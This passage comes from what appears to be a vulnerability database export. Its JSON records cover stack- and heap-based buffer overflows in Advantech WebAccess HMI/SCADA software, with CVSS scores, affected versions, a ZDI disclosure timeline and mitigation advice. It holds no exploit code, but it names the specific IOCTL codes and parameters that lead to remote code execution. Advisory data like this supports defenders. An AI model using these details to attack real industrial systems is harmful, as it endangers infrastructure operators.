"data": [ { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-147" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-147" } ] }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "(0Day) Advantech WebAccess webvrpcs Service BwWebSvc.dll ProjectName sprintf Stack-Based Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-16-147" } ], "trust": 0.7 } }
var-201602-0486
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x13C6D IOCTL in the BwOpcTool subsystem. A stack-based buffer overflow vulnerability exists in a call to memcpy using the TagName parameter. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system.
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-141" } ] }, "credits": { "_id": null, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-16-141" } ], "trust": 0.7 }, "cvss": { "_id": null, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.6, "id": "ZDI-16-141", "impactScore": 10.0, "integrityImpact": "COMPLETE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "ZDI-16-141", "trust": 0.7, "value": "HIGH" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-141" } ] }, "description": { "_id": null, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x13C6D IOCTL in the BwOpcTool subsystem. A stack-based buffer overflow vulnerability exists in a call to memcpy using the TagName parameter. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system.", "sources": [ { "db": "ZDI", "id": "ZDI-16-141" } ], "trust": 0.7 }, "external_ids": { "_id": null, "data": [ { "db": "ZDI_CAN", "id": "ZDI-CAN-3169", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-16-141", "trust": 0.7 } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-141" } ] }, "id": "VAR-201602-0486", "iot": { "_id": null, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.41739574 }, "last_update_date": "2022-05-17T01:47:56.523000Z", "patch": { "_id": null, "data": [ { "title": "This vulnerability is being disclosed publicly without a patch in accordance with the ZDI vulnerability disclosure policy on lack of vendor response.09/15/2015 - 09/17/2015 - ZDI disclosed reports to ICS-CERT (+1 more on 9/29/2015).09/15/2015 and 09/17/2015 - ICS-CERT acknowledged with a tracking number.10/06/2015 - ICS-CERT advised ZDI that the vendor was working on a patch tentatively planned for November.11/10/2015 - ICS-CERT advised ZDI that this patch/next version would be released in early December.12/14/2015 - ZDI asked ICS-CERT if a patch was available. 12/15/2015 - ICS-CERT advised ZDI that a patch release was expected \"any day now.\"12/15/2015 - ICS-CERT inquired with the vendor about the patch.01/06/2016 - ICS-CERT advised ZDI that the vendor released WebAccess 8.1.01/06/2016 - ZDI asked ICS-CERT what fixes are supposed to be in the build. 01/13/2016 - ICS-CERT provided ZDI with a written draft advisory.01/15/2016 - ICS-CERT published an advisory.01/15/2016 - ZDI asked ICS-CERT to confirm CVE mapping.01/22/2016 and 01/26/2016 - ZDI discussed with ICS-CERT by phone the concern that the patch seemed incomplete.01/27/2015 - ZDI concluded that this cases is not patched.02/01/2015 - ZDI notified ICS-CERT intent to release a 0-day advisory02/02/2015 - ZDI advisory released.-- Mitigation:Given the nature of the vulnerability, the only salient mitigation strategy is to restrict interaction with the service to trusted machines. Only the clients and servers that have a legitimate procedural relationship with the service should be permitted to communicate with it. This could be accomplished in a number of ways, most notably with firewall rules/whitelisting. These features are available in the native Windows Firewall, as described in and numerous other Microsoft Knowledge Base articles.", "trust": 0.7, "url": "http://technet.microsoft.com/en-us/library/cc725770%28ws.10%29.aspx" } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-141" } ] }, "references": { "_id": null, "data": [ { "trust": 0.7, "url": "http://technet.microsoft.com/en-us/library/cc725770%28ws.10%29.aspx" } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-141" } ] }, "sources": { "_id": null, "data": [ { "db": "ZDI", "id": "ZDI-16-141", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-141", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-141", "ident": null } ] }, "title": { "_id": null, "data": "(0Day) Advantech WebAccess webvrpcs Service BwWebSvc.dll TagName memcpy Stack-Based Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-16-141" } ], "trust": 0.7 } }
var-202110-0996
Vulnerability from variot
Advantech WebAccess versions 9.02 and prior are vulnerable to a stack-based buffer overflow, which may allow an attacker to remotely execute code. Advantech WebAccess Exists in an out-of-bounds write vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Authentication is not required to exploit this vulnerability.The specific flaw exists within the handling of IOCTL 0x1138B. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of Administrator. Advantech WebAccess is a set of browser-based HMI/SCADA software from Advantech.
A stack buffer overflow vulnerability exists in Advantech WebAccess 9.02 and earlier
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-202110-0996", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "9.0.2" }, { "model": "webaccess", "scope": "lte", "trust": 0.8, "vendor": "\u30a2\u30c9\u30d0\u30f3\u30c6\u30c3\u30af\u682a\u5f0f\u4f1a\u793e", "version": "9.02 and earlier" }, { "model": "webaccess", "scope": "eq", "trust": 0.8, "vendor": "\u30a2\u30c9\u30d0\u30f3\u30c6\u30c3\u30af\u682a\u5f0f\u4f1a\u793e", "version": null }, { "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null }, { "model": "webaccess", "scope": "lte", "trust": 0.6, "vendor": "advantech", "version": "\u003c=9.02" } ], "sources": [ { "db": "ZDI", "id": "ZDI-22-259" }, { "db": "CNVD", "id": "CNVD-2021-80266" }, { "db": "JVNDB", "id": "JVNDB-2021-013712" }, { "db": "NVD", "id": "CVE-2021-38389" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Natnael Samson (@NattiSamson)", "sources": [ { "db": "ZDI", "id": "ZDI-22-259" }, { "db": "CNNVD", "id": "CNNVD-202110-892" } ], "trust": 1.3 }, "cve": "CVE-2021-38389", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2021-38389", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 1.9, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2021-80266", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "VHN-400026", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2021-38389", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 2.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "OTHER", "availabilityImpact": "High", "baseScore": 9.8, "baseSeverity": "Critical", "confidentialityImpact": "High", "exploitabilityScore": null, "id": "JVNDB-2021-013712", "impactScore": null, "integrityImpact": "High", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" }, { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "ZDI", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2021-38389", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 0.7, "userInteraction": "NONE", "vectorString": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2021-38389", "trust": 1.0, "value": "CRITICAL" }, { "author": "ics-cert@hq.dhs.gov", "id": "CVE-2021-38389", "trust": 1.0, "value": "CRITICAL" }, { "author": "NVD", "id": "CVE-2021-38389", "trust": 0.8, "value": "Critical" }, { "author": "ZDI", "id": "CVE-2021-38389", "trust": 0.7, "value": "CRITICAL" }, { "author": "CNVD", "id": "CNVD-2021-80266", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-202110-892", "trust": 0.6, "value": "CRITICAL" }, { "author": "VULHUB", "id": "VHN-400026", "trust": 0.1, "value": "HIGH" }, { "author": "VULMON", "id": "CVE-2021-38389", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-22-259" }, { "db": "CNVD", "id": "CNVD-2021-80266" }, { "db": "VULHUB", "id": "VHN-400026" }, { "db": "VULMON", "id": "CVE-2021-38389" }, { "db": "JVNDB", "id": "JVNDB-2021-013712" }, { "db": "CNNVD", "id": "CNNVD-202110-892" }, { "db": "NVD", "id": "CVE-2021-38389" }, { "db": "NVD", "id": "CVE-2021-38389" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess versions 9.02 and prior are vulnerable to a stack-based buffer overflow, which may allow an attacker to remotely execute code. Advantech WebAccess Exists in an out-of-bounds write vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Authentication is not required to exploit this vulnerability.The specific flaw exists within the handling of IOCTL 0x1138B. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of Administrator. Advantech WebAccess is a set of browser-based HMI/SCADA software from Advantech. \n\r\n\r\nA stack buffer overflow vulnerability exists in Advantech WebAccess 9.02 and earlier", "sources": [ { "db": "NVD", "id": "CVE-2021-38389" }, { "db": "JVNDB", "id": "JVNDB-2021-013712" }, { "db": "ZDI", "id": "ZDI-22-259" }, { "db": "CNVD", "id": "CNVD-2021-80266" }, { "db": "VULHUB", "id": "VHN-400026" }, { "db": "VULMON", "id": "CVE-2021-38389" } ], "trust": 2.97 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2021-38389", "trust": 4.7 }, { "db": "ICS CERT", "id": "ICSA-21-285-02", "trust": 3.2 }, { "db": "ZDI", "id": "ZDI-22-259", "trust": 1.3 }, { "db": "JVN", "id": "JVNVU97189148", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2021-013712", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-12966", "trust": 0.7 }, { "db": "CNVD", "id": "CNVD-2021-80266", "trust": 0.6 }, { "db": "CS-HELP", "id": "SB2021101312", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2021.3440", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-202110-892", "trust": 0.6 }, { "db": "VULHUB", "id": "VHN-400026", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2021-38389", "trust": 0.1 } ], "sources": [ { "db": "ZDI", "id": "ZDI-22-259" }, { "db": "CNVD", "id": "CNVD-2021-80266" }, { "db": "VULHUB", "id": "VHN-400026" }, { "db": "VULMON", "id": "CVE-2021-38389" }, { "db": "JVNDB", "id": "JVNDB-2021-013712" }, { "db": "CNNVD", "id": "CNNVD-202110-892" }, { "db": "NVD", "id": "CVE-2021-38389" } ] }, "id": "VAR-202110-0996", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "CNVD", "id": "CNVD-2021-80266" }, { "db": "VULHUB", "id": "VHN-400026" } ], "trust": 1.13470696 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.6 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2021-80266" } ] }, "last_update_date": "2024-08-14T14:03:02.741000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Top\u00a0Page", "trust": 0.8, "url": "https://www.advantech.com/" }, { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 0.7, "url": "https://www.cisa.gov/uscert/ics/advisories/icsa-21-285-02" }, { "title": "Patch for Advantech WebAccess Stack Buffer Overflow Vulnerability (CNVD-2021-80266)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/294856" }, { "title": "Advantech WebAccess Buffer error vulnerability fix", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=166736" } ], "sources": [ { "db": "ZDI", "id": "ZDI-22-259" }, { "db": "CNVD", "id": "CNVD-2021-80266" }, { "db": "JVNDB", "id": "JVNDB-2021-013712" }, { "db": "CNNVD", "id": "CNNVD-202110-892" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-787", "trust": 1.1 }, { "problemtype": "CWE-121", "trust": 1.0 }, { "problemtype": "Out-of-bounds writing (CWE-787) [NVD evaluation ]", "trust": 0.8 } ], "sources": [ { "db": "VULHUB", "id": "VHN-400026" }, { "db": "JVNDB", "id": "JVNDB-2021-013712" }, { "db": "NVD", "id": "CVE-2021-38389" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.0, "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-285-02" }, { "trust": 1.5, "url": "https://www.cisa.gov/uscert/ics/advisories/icsa-21-285-02" }, { "trust": 1.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2021-38389" }, { "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu97189148/index.html" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2021.3440" }, { "trust": 0.6, "url": "https://www.zerodayinitiative.com/advisories/zdi-22-259/" }, { "trust": 0.6, "url": "https://www.cybersecurity-help.cz/vdb/sb2021101312" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/787.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" } ], "sources": [ { "db": "ZDI", "id": "ZDI-22-259" }, { "db": "CNVD", "id": "CNVD-2021-80266" }, { "db": "VULHUB", "id": "VHN-400026" }, { "db": "VULMON", "id": "CVE-2021-38389" }, { "db": "JVNDB", "id": "JVNDB-2021-013712" }, { "db": "CNNVD", "id": "CNNVD-202110-892" }, { "db": "NVD", "id": "CVE-2021-38389" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "ZDI", "id": "ZDI-22-259" }, { "db": "CNVD", "id": "CNVD-2021-80266" }, { "db": "VULHUB", "id": "VHN-400026" }, { "db": "VULMON", "id": "CVE-2021-38389" }, { "db": "JVNDB", "id": "JVNDB-2021-013712" }, { "db": "CNNVD", "id": "CNNVD-202110-892" }, { "db": "NVD", "id": "CVE-2021-38389" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2022-02-02T00:00:00", "db": "ZDI", "id": "ZDI-22-259" }, { "date": "2021-10-26T00:00:00", "db": "CNVD", "id": "CNVD-2021-80266" }, { "date": "2021-10-18T00:00:00", "db": "VULHUB", "id": "VHN-400026" }, { "date": "2021-10-18T00:00:00", "db": "VULMON", "id": "CVE-2021-38389" }, { "date": "2022-09-27T00:00:00", "db": "JVNDB", "id": "JVNDB-2021-013712" }, { "date": "2021-10-12T00:00:00", "db": "CNNVD", "id": "CNNVD-202110-892" }, { "date": "2021-10-18T13:15:09.507000", "db": "NVD", "id": "CVE-2021-38389" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2022-02-02T00:00:00", "db": "ZDI", "id": "ZDI-22-259" }, { "date": "2022-01-18T00:00:00", "db": "CNVD", "id": "CNVD-2021-80266" }, { "date": "2021-10-20T00:00:00", "db": "VULHUB", "id": "VHN-400026" }, { "date": "2021-10-20T00:00:00", "db": "VULMON", "id": "CVE-2021-38389" }, { "date": "2022-09-27T02:11:00", "db": "JVNDB", "id": "JVNDB-2021-013712" }, { "date": "2022-02-07T00:00:00", "db": "CNNVD", "id": "CNNVD-202110-892" }, { "date": "2021-10-20T22:17:57.443000", "db": "NVD", "id": "CVE-2021-38389" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-202110-892" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech\u00a0WebAccess\u00a0 Out-of-bounds write vulnerability in", "sources": [ { "db": "JVNDB", "id": "JVNDB-2021-013712" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "buffer error", "sources": [ { "db": "CNNVD", "id": "CNNVD-202110-892" } ], "trust": 0.6 } }
var-201805-1128
Vulnerability from variot
In Advantech WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior, a heap-based buffer overflow vulnerability has been identified, which may allow an attacker to execute arbitrary code. plural Advantech WebAccess The product contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x13C80 IOCTL in the BwOpcTool subsystem. When parsing the NamedObject structure, the process does not properly validate the length of user-supplied data prior to copying it to a fixed-length, heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of Administrator. Advantech WebAccess and others are products of Advantech. Advantech WebAccess is a browser-based HMI/SCADA software. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. WebAccess Dashboard is one of the dashboard components; WebAccess Scada Node is one of the monitoring node components. WebAccess/NMS is a suite of web browsers for the Network Management System (NMS). A heap buffer overflow vulnerability exists in several Advantech products. Advantech WebAccess is prone to the following security vulnerabilities: 1. Multiple SQL-injection vulnerabilities 2. An information-disclosure vulnerability 3. A file-upload vulnerability 4. Multiple directory-traversal vulnerabilities 5. Multiple stack-based buffer-overflow vulnerabilities 6. A heap-based buffer-overflow vulnerability 7. Multiple arbitrary code-execution vulnerabilities 8. A denial-of-service vulnerability 9. A security-bypass vulnerability 10. A privilege-escalation vulnerability An attacker can exploit these issues to execute arbitrary code in the context of the application, or modify data, or exploit latent vulnerabilities in the underlying database, delete arbitrary files, gain elevated privileges, perform certain unauthorized actions, upload arbitrary files to the affected application gain unauthorized access and obtain sensitive information. Failed attacks will cause denial of service conditions. Advantech WebAccess, etc. Advantech WebAccess is a set of HMI/SCADA software based on browser architecture. The following products and versions are affected: Advantech WebAccess 8.2_20170817 and earlier, 8.3.0 and earlier; WebAccess Dashboard 2.0.15 and earlier; WebAccess Scada Node 8.3.1 and earlier; WebAccess/NMS 2.0.3 and earlier
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": "lte", "trust": 1.8, "vendor": "advantech", "version": "8.2_20170817" }, { "_id": null, "model": "webaccess", "scope": "lte", "trust": 1.8, "vendor": "advantech", "version": "8.3.0" }, { "_id": null, "model": "webaccess dashboard", "scope": "lte", "trust": 1.8, "vendor": "advantech", "version": "2.0.15" }, { "_id": null, "model": "webaccess\\/nms", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "2.0.3" }, { "_id": null, "model": "webaccess scada", "scope": "lt", "trust": 1.0, "vendor": "advantech", "version": "8.3.1" }, { "_id": null, "model": "webaccess dashboard", "scope": "eq", "trust": 0.9, "vendor": "advantech", "version": "2.0.15" }, { "_id": null, "model": "webaccess scada node", "scope": "lt", "trust": 0.8, "vendor": "advantech", "version": "8.3.1" }, { "_id": null, "model": "webaccess/nms", "scope": "lte", "trust": 0.8, "vendor": "advantech", "version": "2.0.3" }, { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess \u003c=v8.2 20170817", "scope": null, "trust": 0.6, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "lte", "trust": 0.6, "vendor": "advantech", "version": "\u003c=8.3.0" }, { "_id": null, "model": "webaccess dashboard", "scope": "lte", "trust": 0.6, "vendor": "advantech", "version": "\u003c=2.0.15" }, { "_id": null, "model": "webaccess/nms", "scope": "lte", "trust": 0.6, "vendor": "advantech", "version": "\u003c=2.0.3" }, { "_id": null, "model": "webaccess scada node", "scope": "lte", "trust": 0.6, "vendor": "advantech", "version": "\u003c=8.3.1" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "8.3.0" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "8.2_20170817" }, { "_id": null, "model": "webaccess\\/nms", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "2.0.3" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.4, "vendor": "webaccess", "version": "*" }, { "_id": null, "model": "webaccess/nms", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "2.0.3" }, { "_id": null, "model": "webaccess/nms", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "2.0" }, { "_id": null, "model": "webaccess scada node", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.3" }, { "_id": null, "model": "webaccess dashboard", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "2.0" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.3" }, { "_id": null, "model": "webaccess 8.2 20170817", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess 8.2 20170330", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.2" }, { "_id": null, "model": "webaccess 8.1 20160519", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.1" }, { "_id": null, "model": "webaccess 8.0 20150816", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8" }, { "_id": null, "model": "webaccess", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": "8.3.1" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess dashboard", "version": "*" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess scada", "version": "*" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess nms", "version": "*" } ], "sources": [ { "db": "IVD", "id": "e2f6d991-39ab-11e9-a20e-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-18-527" }, { "db": "CNVD", "id": "CNVD-2018-13781" }, { "db": "BID", "id": "104190" }, { "db": "JVNDB", "id": "JVNDB-2018-005077" }, { "db": "CNNVD", "id": "CNNVD-201805-441" }, { "db": "NVD", "id": "CVE-2018-8845" } ] }, "configurations": { "_id": null, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:webaccess", "vulnerable": true }, { "cpe22Uri": "cpe:/a:advantech:webaccess_dashboard", "vulnerable": true }, { "cpe22Uri": "cpe:/a:advantech:webaccess_scada", "vulnerable": true }, { "cpe22Uri": 